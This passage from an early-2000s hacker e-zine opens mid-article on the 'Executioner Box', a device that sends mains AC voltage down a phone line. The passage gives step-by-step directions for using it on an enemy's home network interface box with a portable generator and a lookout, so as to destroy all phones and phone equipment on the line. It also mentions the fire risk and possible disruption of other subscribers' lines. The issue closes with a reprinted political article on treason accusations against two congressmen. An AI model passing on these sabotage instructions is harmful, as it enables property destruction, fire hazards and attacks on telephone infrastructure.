simply disconnect the existing handset cord from the handset cord jack
in the base of the phone you'll be connecting up Executioner Box I or II
to, connect the line cord plug end of the modified handset cord into
the surface mount jack on Executioner Box I or II, and connect the other
handset cord plug end into the handset cord jack on the phone's base.
Details of how to modify a handset cord in this way can be found in my
"Conversion box" file. And, since the basic concept behind that was
essentially taken from my Bungee box, that could also be used for
reference, too. But, the thing is, if you connect the Executioner Box I or II
directly to a phone in this way, you'll also ruin that phone. Even so, I
just wanted you to know it was possible to connect up Executioner Box I
or II in this way. Anyway, on to how to use this.=20
-Usage-
If you're going to use this at someone's TNI, (Network Interface)
you'll need a portable source of AC voltage, like a portable generator.
Some portable generators are quite noisy, because they use moving parts
like a motor to serve as the alternator for generating the necessary AC
voltage/current. So, you'll want to get a portable generator that uses a
battery for power, and runs quiet. Last I seen, Radio Shack sold a
portable generator called PortaWattz that operated on a 12v battery, could
handle up to 300 Watts, and had an AC output of 115VAC. Which is
perfect. You'll want a generator that can put out between 110-120VAC. But,
this Radio Shack generator is only availible through Radio Shack
Unlimited (Comapny direct sales) last time I checked. So, you won't find it in
Radio Shack stores. And, at $149.99 +tax (as listed in their 2001
catalog) It's quite expensive. But otherwise, without a portable generator,
you'd only be able to use the Executioner box wherever you have access
to an AC electrical outlet. At any rate, whether using it at a TNI, or
at a standard phone jack, the basic principal remains the same. Connect
up a modular line cord to the Executioner box that's connected to a
working phone jack. Plug the AC power cord into a working AC outlet (turn
it on if you're using a lamp cord with an on/off switch), and within a
moment or so, you'll fry the internal electronic components of all
phones, and phone equipment attached to the phone line in the house.
Needless to say, this is obviously a box you only want to use on your
enemies. Also, I definitely suggest you either turn off or unplug Executioner
box II before very long, as leaving it plugged in/turned on for long
periods of time could run the risk of starting a fire. Phones and all
phone equipment simply aren't meant to handle this kind of voltage and
current. Also, phone voltage is typically DC (Except when ringing).
Speaking of that, when you connect up Executioner box II, it will make all
phones on the line ring. Even if they're off the hook. Anyway, let's get
back to the topic of using the Executioner Box II at a TNI. Simply open
the TNI on the customer access side. (You could open the whole TNI
through the Telco Access side, but It's not necessary). Remove the plug of
the short line cord from the test jack. It would be the one with wires
running into the house attached to the 2 screw terminals alongside the
test jack. (Unused test jacks don't have connection to the phone wiring
from the house). After unplugging the cord from the test jack, connect
it to Executioner box II. With newer model TNI boxes (which have no
short line cord plugged into the test jack), you've got to plug in a
working phone into the test jack, then connect up the Executioner Box II
via a line cord modified alligator clips. And, attach the alligator clips
to the ends of the wire leads of the phone line running into the house.
If need be, you can unscrew those wire leads from the 2 screw terminals
they're connected to inside the TNI box. Now, turn on the power for the
generator, and turn the AC cord's on/off switch on (if you built this
box with that kind of cord) for a brief moment or so, then turn it off.
Quickly unplug the line cord from Executioner box II, and plug it back
into the test jack where it was. Close up the TNI, pack up all your
stuff, and get the hell out of there, FAST! One final note: It's not a
good idea to connect up the Executioner box and use it inside your house,
or anyone else's, since the voltage surge could travel all the way back
to your local CO (Central Office) and cause problems for other area
phone lines. Remember, this box is dangerous with a capital "D"! So,
exercising caution when using it is definitely the best way to go. And, you
may want to have some one come along with you to serve as "look out".
If you want to test the effects of this box on only 1 phone that you
don't need anymore, just connect a phone line cord between Executioner box
II and the phone. Plug in the AC cord into an AC outlet (turn the AC
cord switch on, if you've built this using a lamp cord) for a brief
moment or so, then unplug the AC cord (or turn the cord switch off).
Congrats! Another phone rendered totally dead and useless. Again, be careful
and intelligent about how, when and where you use this box, and have
phun.
_______________________________________________________________
|______________________________________________________________ |
|| ||
|| ___ _ ____ _ ||
|| / _ \ _ _| |_| __ ) _ __ ___ __ _| | _ ||
|| | | | | | | | __| _ \| '__/ _ \/ _` | |/ / ||
|| | |_| | |_| | |_| |_) | | | __/ (_| | < ||
|| \___/ \__,_|\__|____/|_| \___|\__,_|_|\_\ ||
|| ||
||_____--------------------------------------------------______||
|_______/-----------------------------------------------\_______|
___ _ _
| __(_)_ _ __ _| |
| _|| | ' \/ _` | |
__ |_| |_|_||_\__,_|_|
\ \ / /__ _ _ __| |___
\ \/\/ / _ \ '_/ _` (_-<
\_/\_/\___/_| \__,_/__/
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
PUT THE WORDS IN HERE:
Hope you all enjoyed issue #11. Now here's something to think
about.
Some Call It Treason
====================
By: Matthew Rothschild
New Jersey State Senator James Cafiero upped the political rhetoric
to a whole new level when, on October 17, he introduced a resolution
urging Attorney General John Ashcroft to indict two Congresspeople
who went to Iraq on charges of treason.
The traitors, according to Cafiero, are Representative Jim McDermott,
Democrat of Washington, and Representative David Bonior, Democrat of
Michigan.
Cafiero, the Republican whip in the Jersey state house, stated in his
resolution: "The public comments critical of the policies and President
of the United States made by United States Representatives Jim McDermott
and David Bonior during a recent trip to Baghdad constitute an act of
treason against the United States. . . .
[Their comments] gave aid and comfort to an enemy of the United States."
McDermott and Bonior were in Iraq at the end of September and in early
October. They were seeking a peaceful resolution to the conflict and
were pleading for the United States to agree to let the U.N. inspectors
return to work right away.
On ABC's "This Week" program of September 29, McDermott said that Bush
was "trying to provoke a war." He also said that the Untied States should
"take the Iraqis at their face value," and--most controversially--"I think
the President would mislead the American people."
McDermott and Bonior immediately came under fire. George Will called them
Saddam's "American collaborators" and "useful idiots." Senator John McCain
slammed them, and Representative Sam Johnson, Republican of Texas, said,
"You cannot cavort around with the enemy and be a good American."
Upon returning to the United States, McDermott tried to do some damage
control. "I perhaps overstated my case," he said.
But Cafiero was not content to leave the controversy
alone. "These two
Congressmen should have known better than to use their position as elected
officials to fan the flames of an already volatile situation by questioning
the wisdom of U.S. foreign policy while standing on Iraqi soil."
Spokespersons for both Representatives declined to comment on Cafiero's
legislation.
But early on in the controversy, McDermott did tell Paula Zahn of CNN,
"Dissent is an American right, and without it, it's not a democracy."
- Outbreak Staff
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
++++++++++++++++++++++++++WATCH THIS SPACE++++++++++++++++++++++
³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij
+-+-+-+-+-+-+-+-+
-°°°±±±±±²²²²²ÛÛÛÛÛÛÛÛÛ²²²±±°ð-|O|u|t|b|r|e|a|k|ð°°°±±±±±²²²²²ÛÛÛÛÛÛÛÛÛ²²²±±°-
+-+-+-+-+-+-+-+-+
³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij
Outbreak Contents may not be used with out express written permission
By the Editor - kleptic@t3k.org
COPYRIGHT©® 2002.
